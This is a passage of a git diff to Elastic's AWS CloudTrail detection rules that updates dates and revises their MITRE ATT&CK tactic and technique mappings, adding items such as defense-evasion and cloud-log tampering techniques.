"https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_s3_uncommon_client_user_agent.toml b/rules/integrations/aws/exfiltration_s3_uncommon_client_user_agent.toml index e64e833936c..be5fa4a3535 100644 --- a/rules/integrations/aws/exfiltration_s3_uncommon_client_user_agent.toml +++ b/rules/integrations/aws/exfiltration_s3_uncommon_client_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/09" integration = ["aws"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -109,22 +109,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" + [[rule.threat.technique.subtechnique]] id = "T1567.002" name = "Exfiltration to Cloud Storage" reference = "https://attack.mitre.org/techniques/T1567/002/" - - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml b/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml index 465364b2801..e0dc490b37c 100644 --- a/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml +++ b/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/01" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -88,46 +88,65 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1496" name = "Resource Hijacking" reference = "https://attack.mitre.org/techniques/T1496/" + [[rule.threat.technique.subtechnique]] id = "T1496.004" name = "Cloud Service Hijacking" reference = "https://attack.mitre.org/techniques/T1496/004/" - - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" + +[[rule.threat.technique.subtechnique]] +id = "T1102.003" +name = "One-Way Communication" +reference = "https://attack.mitre.org/techniques/T1102/003/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml b/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml index 4b6fbec2338..f432d063a59 100644 --- a/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml +++ b/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/17" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Austin Songer", "Elastic"] @@ -121,17 +121,34 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1489" name = "Service Stop" reference = "https://attack.mitre.org/techniques/T1489/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml b/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml index 013d9381c79..6ec5c340a09 100644 --- a/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml +++ b/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/01" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -111,18 +111,25 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1657" name = "Financial Theft" reference = "https://attack.mitre.org/techniques/T1657/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1580" +name = "Cloud Infrastructure Discovery" +reference = "https://attack.mitre.org/techniques/T1580/" + [[rule.threat.technique]] id = "T1619" name = "Cloud Storage Object Discovery" @@ -132,20 +139,19 @@ reference = "https://attack.mitre.org/techniques/T1619/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - - [rule.threshold] field = ["tls.client.server_name", "source.address", "aws.cloudtrail.user_identity.type"] value = 1 diff --git a/rules/integrations/aws/impact_cloudtrail_logging_updated.toml b/rules/integrations/aws/impact_cloudtrail_logging_updated.toml index f19cadad27f..cbab012a4ea 100644 --- a/rules/integrations/aws/impact_cloudtrail_logging_updated.toml +++ b/rules/integrations/aws/impact_cloudtrail_logging_updated.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/10" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,34 +87,52 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1565" name = "Data Manipulation" reference = "https://attack.mitre.org/techniques/T1565/" + [[rule.threat.technique.subtechnique]] id = "T1565.001" name = "Stored Data Manipulation" reference = "https://attack.mitre.org/techniques/T1565/001/" - - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml b/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml index 1f6a8dd5d98..ed265299c71 100644 --- a/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml +++ b/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/18" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -151,34 +151,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml b/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml index 6312cf48c76..4ee8165d8fe 100644 --- a/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml +++ b/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/20" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -138,34 +138,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml b/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml index 0aa53f8fd0e..0b73ed699c3 100644 --- a/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml +++ b/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/05" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -125,22 +125,39 @@ event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.acti [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1565" name = "Data Manipulation" reference = "https://attack.mitre.org/techniques/T1565/" + [[rule.threat.technique.subtechnique]] id = "T1565.001" name = "Stored Data Manipulation" reference = "https://attack.mitre.org/techniques/T1565/001/" - - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" + +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml b/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml index 1221591ba53..c6951c7a183 100644 --- a/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml +++ b/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/02" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -116,6 +116,7 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" @@ -126,12 +127,28 @@ id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" + +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml b/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml index 2a685166ca7..b5533647e46 100644 --- a/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml +++ b/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/26" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -116,34 +116,52 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1531" name = "Account Access Removal" reference = "https://attack.mitre.org/techniques/T1531/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.006" name = "Multi-Factor Authentication" reference = "https://attack.mitre.org/techniques/T1556/006/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_kms_cmk_disabled_or_scheduled_for_deletion.toml b/rules/integrations/aws/impact_kms_cmk_disabled_or_scheduled_for_deletion.toml index 245d0ffc077..84fdd4c093a 100644 --- a/rules/integrations/aws/impact_kms_cmk_disabled_or_scheduled_for_deletion.toml +++ b/rules/integrations/aws/impact_kms_cmk_disabled_or_scheduled_for_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/21" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Xavier Pich"] @@ -145,17 +145,21 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique.subtechnique]] +id = "T1485.001" +name = "Lifecycle-Triggered Deletion" +reference = "https://attack.mitre.org/techniques/T1485/001/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml b/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml index d12ddb1dc74..faa111891fb 100644 --- a/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml +++ b/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/28" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -124,17 +124,34 @@ any where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" + +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_rds_snapshot_deleted.toml b/rules/integrations/aws/impact_rds_snapshot_deleted.toml index 7e6e4313c9b..ccee14c1e59 100644 --- a/rules/integrations/aws/impact_rds_snapshot_deleted.toml +++ b/rules/integrations/aws/impact_rds_snapshot_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/29" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -154,17 +154,21 @@ any where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1490" +name = "Inhibit System Recovery" +reference = "https://attack.mitre.org/techniques/T1490/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml b/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml index 36ccc844da3..5cb0621244b 100644 --- a/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml +++ b/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/17" integration = ["aws"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -148,6 +148,7 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" @@ -156,10 +157,19 @@ reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] id = "T1486" name = "Data Encrypted for Impact" -reference = "https://attack.mitre.org/techniques/T1486/" +reference = "https://attack.mitre.org/techniques/T1486/" + +[[rule.threat.technique]] +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules/integrations/aws/impact_s3_static_site_js_file_uploaded.toml b/rules/integrations/aws/impact_s3_static_site_js_file_uploaded.toml index 743ff129052..9a4bfdd2df7 100644 --- a/rules/integrations/aws/impact_s3_static_site_js_file_uploaded.toml +++ b/rules/integrations/aws/impact_s3_static_site_js_file_uploaded.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/15" integration = ["aws"] maturity = "production" -updated_date = "2025/12/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,10 +122,22 @@ from logs-aws.cloudtrail* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1491" +name = "Defacement" +reference = "https://attack.mitre.org/techniques/T1491/" + +[[rule.threat.technique.subtechnique]] +id = "T1491.002" +name = "External Defacement" +reference = "https://attack.mitre.org/techniques/T1491/002/" + [[rule.threat.technique]] id = "T1565" name = "Data Manipulation" reference = "https://attack.mitre.org/techniques/T1565/" + [[rule.threat.technique.subtechnique]] id = "T1565.001" name = "Stored Data Manipulation" @@ -135,7 +147,6 @@ reference = "https://attack.mitre.org/techniques/T1565/001/" id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_s3_unusual_object_encryption_with_sse_c.toml b/rules/integrations/aws/impact_s3_unusual_object_encryption_with_sse_c.toml index aacd3792c06..3553a07eb9e 100644 --- a/rules/integrations/aws/impact_s3_unusual_object_encryption_with_sse_c.toml +++ b/rules/integrations/aws/impact_s3_unusual_object_encryption_with_sse_c.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/15" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -105,17 +105,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1486" name = "Data Encrypted for Impact" reference = "https://attack.mitre.org/techniques/T1486/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/initial_access_console_login_root.toml b/rules/integrations/aws/initial_access_console_login_root.toml index a8842b9754b..8ac3d7d8659 100644 --- a/rules/integrations/aws/initial_access_console_login_root.toml +++ b/rules/integrations/aws/initial_access_console_login_root.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/11" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -133,10 +133,12 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" @@ -146,19 +148,3 @@ reference = "https://attack.mitre.org/techniques/T1078/004/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/aws/initial_access_iam_session_token_used_from_multiple_addresses.toml b/rules/integrations/aws/initial_access_iam_session_token_used_from_multiple_addresses.toml index 18c4c507427..0fe9671e72d 100644 --- a/rules/integrations/aws/initial_access_iam_session_token_used_from_multiple_addresses.toml +++ b/rules/integrations/aws/initial_access_iam_session_token_used_from_multiple_addresses.toml @@ -4,7 +4,7 @@ integration = ["aws"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "aws.cloudtrail.session_credential_from_console field introduced in AWS integration version 4.6.0" -updated_date = "2026/02/25" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -222,19 +222,36 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/aws/initial_access_kali_user_agent_detected_with_aws_cli.toml b/rules/integrations/aws/initial_access_kali_user_agent_detected_with_aws_cli.toml index 93696cfc640..5b330a552b7 100644 --- a/rules/integrations/aws/initial_access_kali_user_agent_detected_with_aws_cli.toml +++ b/rules/integrations/aws/initial_access_kali_user_agent_detected_with_aws_cli.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/11" integration = ["aws"] maturity = "production" -updated_date = "2025/12/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,22 +110,39 @@ any where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/initial_access_password_recovery.toml b/rules/integrations/aws/initial_access_password_recovery.toml index 32b17765f99..f5071de40fb 100644 --- a/rules/integrations/aws/initial_access_password_recovery.toml +++ b/rules/integrations/aws/initial_access_password_recovery.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/02" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -125,14 +125,18 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml b/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml index 7a3ec1d8500..ca830abaef2 100644 --- a/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml +++ b/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,36 +106,54 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.004" name = "SSH" reference = "https://attack.mitre.org/techniques/T1021/004/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.004" name = "SSH Authorized Keys" reference = "https://attack.mitre.org/techniques/T1098/004/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE 